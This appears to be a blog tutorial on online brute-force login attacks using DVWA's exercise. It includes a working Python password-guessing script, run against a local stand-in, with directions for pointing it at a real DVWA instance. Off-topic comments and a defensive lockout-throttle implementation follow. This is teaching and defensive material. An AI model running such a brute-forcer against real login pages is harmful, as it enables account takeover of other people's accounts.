BRUTE FORCE AUTHENTICATION ATTACKS


Authentication actually takes place in many parts of a web application other than the main login page.

It is also present when you change your password, update your account information, use the password recovery functionality, answer secret questions, and use the "remember me" option.

If any one of these authentication processes is flawed, the security of all the others may be compromised along with it.

The frightening thing about authentication vulnerabilities is that they can open the door for all other accounts to be compromised.

Imagine the carnage when an administrator’s account is compromised because of poor authentication!

We will be using the Brute Force exercise in DVWA (Damn Vulnerable Web Application) as our guide to complete an online brute force authentication attack.

It is an HTML form-based authentication page, just like over 90% of web applications use.

Despite ongoing efforts to add further checks to the authentication process, such as CAPTCHAs and challenge questions, the traditional username and password is still the most popular authentication mechanism.

This attack is very different from the offline password hash cracking that we completed with John the Ripper.

We will now be interacting directly with the web application and the database that process the username and password parameters during authentication.

Online brute force authentication attacks are much slower than offline password hash cracking because every guess is a separate request to the application: we must wait for it to process the guess and send a response back before moving on to the next one. Each guess also leaves a record in the server's logs and is subject to any lockout or rate-limiting policy the application enforces, so online attacks are noisy and should be targeted, not sprayed.
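The following is an added example, not code from the original post or from DVWA. It shows the online attack described above against the DVWA brute-force exercise at security level "low": one GET request per candidate password to `/vulnerabilities/brute/` with the `username`, `password` and `Login` parameters, the `PHPSESSID` session cookie and `security=low`, and success decided by whether the response carries DVWA's "Welcome to the password protected area" text or its "Username and/or password incorrect." text. So that it runs offline, the script starts a constructed local stand-in for that page (its account `admin`/`password` and the wordlist are made up for the demonstration); against a real DVWA instance you would point `base_url` at it and paste in the session id from your browser.

```python
"""Online brute force of a DVWA-style form login, run against a local stand-in server."""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Response fragments DVWA's brute-force exercise returns at security level "low"
FAIL_MARKER = "Username and/or password incorrect."
WELCOME_MARKER = "Welcome to the password protected area"

# Constructed wordlist standing in for a real one such as rockyou.txt
WORDLIST = ["123456", "letmein", "qwerty", "password", "admin"]


class FakeDVWA(BaseHTTPRequestHandler):
    """Constructed local stand-in for /vulnerabilities/brute/: one GET per guess, no throttling."""

    VALID = {"admin": "password"}  # constructed account for the stand-in only

    def do_GET(self):
        parsed = urllib.parse.urlparse(self.path)
        params = urllib.parse.parse_qs(parsed.query)
        user = params.get("username", [""])[0]
        password = params.get("password", [""])[0]
        if parsed.path != "/vulnerabilities/brute/" or "Login" not in params:
            body = "<p>form not submitted</p>"
        elif self.VALID.get(user) == password:
            body = f"<p>{WELCOME_MARKER} {user}</p>"
        else:
            body = f"<pre><br />{FAIL_MARKER}</pre>"
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # silence per-request logging
        pass


def start_fake_dvwa():
    """Bind an ephemeral port on localhost and serve the stand-in in the background."""
    server = HTTPServer(("127.0.0.1", 0), FakeDVWA)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


# Bypass any system proxy so the localhost requests go straight to the stand-in
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def try_login(base_url, session_id, username, password, timeout=5):
    """One online guess: send the form parameters and decide success from the response body."""
    query = urllib.parse.urlencode({"username": username, "password": password, "Login": "Login"})
    req = urllib.request.Request(f"{base_url}/vulnerabilities/brute/?{query}")
    # DVWA expects the authenticated session cookie and the security level, as a browser sends them
    req.add_header("Cookie", f"PHPSESSID={session_id}; security=low")
    with _opener.open(req, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", "replace")
    if WELCOME_MARKER in body:
        return True
    if FAIL_MARKER in body:
        return False
    # Neither marker: the session has probably expired or the security level is not "low"
    raise RuntimeError("unexpected response: " + body[:80])


def brute_force(base_url, session_id, username, wordlist):
    """Try each candidate in order; return (password, attempts) or (None, attempts)."""
    for attempts, candidate in enumerate(wordlist, start=1):
        if try_login(base_url, session_id, username, candidate):
            return candidate, attempts
    return None, len(wordlist)


if __name__ == "__main__":
    server, url = start_fake_dvwa()
    try:
        found, n = brute_force(url, "constructed-session-id", "admin", WORDLIST)
        print(f"admin -> {found!r} after {n} request(s)")
    finally:
        server.shutdown()
```

The `RuntimeError` branch matters in practice: when DVWA's session times out the page redirects to the login form and neither marker appears, and a brute forcer that treats "not the failure text" as success will report a false hit. The request count returned by `brute_force` is also the number of lines the attack wrote into the target's access log.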


If you want me to do a drawing for you for your birthday, I can; I just need your birthdate, time and place of birth. Then I can post it here and provide a link where you can download and print it, or you can give me your snail mail and I will send it to you, FREE. If you want to donate SBD, that's fine, but it's up to you. Peace and happy birthday.

I am sorry I saw your comment really late, and yeah, I will be really happy if you do that for me. It will be a great gift from your side, and we will decide later whether to print it out or receive the one you made for me.
My date of birth is 19th March; the time was 5:10 PM, Quetta, Pakistan.
Thanks a lot :)

Hi! I am a robot. I just upvoted you! I found similar content that readers might be interested in:
https://issuu.com/elvedin/docs/the_basics_of_web_hacking_-_josh_pa/99

You got upvoted from @adriatik bot! Thank you for using our service. We really hope this will help to promote your quality content!

This vulnerability is a really easy one to defend against. As a dev you can block the account after a number of failed login attempts, or just add an exponential delay, like 3 tries, 1 minute delay; 4 tries, 10 minutes delay; 5 tries, 100 minutes delay; and so on.
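As an added example (not code from the post or the commenter), here is the delay policy the comment above describes, implemented as a per-account throttle: failures 1 and 2 cost nothing, the 3rd failure locks the account for 1 minute, the 4th for 10 minutes, the 5th for 100 minutes, and a successful login clears the counter. The `verify(account, password)` callback, the `FakeClock`, and the account and guesses in `demo()` are assumptions made for the demonstration; the clock is injected so the policy can be exercised without actually sleeping.

```python
"""Lockout policy with an exponentially growing delay after repeated failures."""
import time


class LoginThrottle:
    """Per-account throttle: failures below `threshold` are free; from the threshold on,
    each further failure multiplies the lockout by `factor`. Defaults follow the policy
    in the comment: 3rd failure 60 s, 4th 600 s, 5th 6000 s, and so on."""

    def __init__(self, threshold=3, base_delay=60.0, factor=10.0, clock=time.monotonic):
        self.threshold = threshold
        self.base_delay = base_delay
        self.factor = factor
        self.clock = clock              # injectable clock so tests need not sleep
        self._failures = {}             # account -> consecutive failure count
        self._locked_until = {}         # account -> clock time when the lock expires

    def delay_for(self, failures):
        """Lockout, in seconds, imposed after `failures` consecutive failures."""
        if failures < self.threshold:
            return 0.0
        return self.base_delay * self.factor ** (failures - self.threshold)

    def seconds_remaining(self, account):
        return max(0.0, self._locked_until.get(account, 0.0) - self.clock())

    def record_failure(self, account):
        """Count a failed attempt and return the delay it triggered (0.0 if none)."""
        n = self._failures.get(account, 0) + 1
        self._failures[account] = n
        delay = self.delay_for(n)
        if delay:
            self._locked_until[account] = self.clock() + delay
        return delay

    def record_success(self, account):
        self._failures.pop(account, None)
        self._locked_until.pop(account, None)


def attempt_login(throttle, verify, account, password):
    """Gate a credential check behind the throttle.

    `verify(account, password) -> bool` is an assumed callback standing in for the real
    password check. Returns (status, seconds) with status "ok", "failed" or "locked".
    """
    remaining = throttle.seconds_remaining(account)
    if remaining > 0:
        return "locked", remaining       # the password is not even evaluated while locked
    if verify(account, password):
        throttle.record_success(account)
        return "ok", 0.0
    return "failed", throttle.record_failure(account)


class FakeClock:
    """Constructed clock for the demonstration: time only moves when advance() is called."""

    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


def demo():
    """Walk the policy through a constructed guessing sequence; returns the outcomes."""
    clock = FakeClock()
    throttle = LoginThrottle(clock=clock)
    verify = lambda account, pw: account == "admin" and pw == "correct horse"  # assumed check
    outcomes = []
    for guess in ["123456", "letmein", "qwerty"]:                          # three wrong guesses
        outcomes.append(attempt_login(throttle, verify, "admin", guess))
    outcomes.append(attempt_login(throttle, verify, "admin", "password"))  # refused: locked
    clock.advance(60)                                                      # wait out the lock
    outcomes.append(attempt_login(throttle, verify, "admin", "password"))  # 4th failure
    clock.advance(600)
    outcomes.append(attempt_login(throttle, verify, "admin", "correct horse"))
    return outcomes


if __name__ == "__main__":
    for status, seconds in demo():
        print(f"{status:7s} {seconds:8.0f} s")
```

Two caveats before copying this into an application. A purely per-account lockout lets anyone who knows a username (an administrator's, for example) lock that user out on purpose by sending wrong passwords, so pair it with a per-source-IP limit and alerting on the overall failure rate rather than relying on it alone. And an attacker can stay under the threshold by spreading a few common passwords across many accounts, which a per-account counter never sees; that pattern shows up only in the aggregate failure count.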